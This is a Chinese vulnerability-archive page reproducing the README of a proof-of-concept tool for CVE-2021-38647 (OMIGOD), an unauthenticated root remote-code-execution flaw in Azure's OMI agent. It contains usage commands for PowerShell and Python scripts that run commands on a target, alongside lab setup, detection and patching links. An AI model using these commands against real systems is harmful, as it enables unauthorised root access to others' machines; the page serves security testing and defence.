关联漏洞
标题:
Microsoft Azure 授权问题漏洞
(CVE-2021-38647)
描述:Microsoft Azure是美国微软(Microsoft)公司的一套开放的企业级云计算平台。 Microsoft Azure Open Management Infrastructure存在授权问题漏洞。以下产品和版本受到影响:Azure Open Management Infrastructure <omi-1.6.8-1。
描述
CVE-2021-38647 - POC to exploit unauthenticated RCE #OMIGOD
介绍
# CVE-2021-38647
CVE-2021-38647 - POC to exploit unauthenticated RCE `#OMIGOD` on Azure UNIX/Linux VMs!
## Details
In Microsoft's Azure, the OMI application gets installed automatically when services like Azure Automation Accounts, Update Management, Log Analytics, Configuration Management, etc., are used for UNIX/Linux VM's. The OMI application also exposes the service over port 5986 if the Configuration Management service is used for managing the machine remotely.
Anyone with network access to vulnerable endpoint can send a request that leverages the SCXcore provider without the Authorization header and execute OS commands on the target machine with root privileges!
This vulnerability is now fixed but always worth to check against Linux VMs in Azure.
## Usage
### PowerShell
```
# Execute command on the target machine.
Invoke-CVE-2021-38647 -TargetIP 127.0.0.1 -TargetPort 5986 -Command whoami
```
```
# Execute script on the target machine.
$MyScript = @"
id
whoami
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
Invoke-CVE-2021-38647 -TargetIP 1.1.1.1 -TargetPort 5986 -Script $enc
```
### Python
```
# Execute command on the target machine.
python CVE-2021-38647.py -t 40.87.92.228 -p 5986 -c id
```
```
# Execute script on the target machine.
$MyScript = @"
id
whoami
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript)) # For Windows
echo 'id' | base64 # For Linux
python CVE-2021-38647.py -t 40.87.92.228 -s ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==
```
## Deploy Test Environment
ARM Template to deploy on Azure - https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-38647-OMI
Deploy without Azure - https://rootsecdev.medium.com/creating-your-own-private-pwn-lab-for-omi-exploitation-b6919fc63956
## Detection & Mitigations
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
To mitigate the vulnerability we need to update OMI agent to version 1.6.8.1 or above.
## Reference Links
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
https://rootsecdev.medium.com/creating-your-own-private-pwn-lab-for-omi-exploitation-b6919fc63956
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-38647-OMI
## Blog
https://www.alteredsecurity.com/post/omigod-cve-2021-38647
## Credit
WIZ Team - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
## Disclaimer
This project is meant for educational purposes only.
The creator takes no responsibility of any mis-use of this tool.
文件快照
[4.0K] /data/pocs/71dce3483766784a673179202949c91a29fd0fae
├── [5.1K] CVE-2021-38647.py
├── [4.0K] images
│ ├── [9.3K] poc01.png
│ ├── [ 26K] poc02.png
│ ├── [6.1K] poc03.png
│ └── [ 26K] poc04.png
├── [5.8K] Invoke-CVE-2021-38647.ps1
├── [ 944] LICENSE
└── [2.9K] README.md
1 directory, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。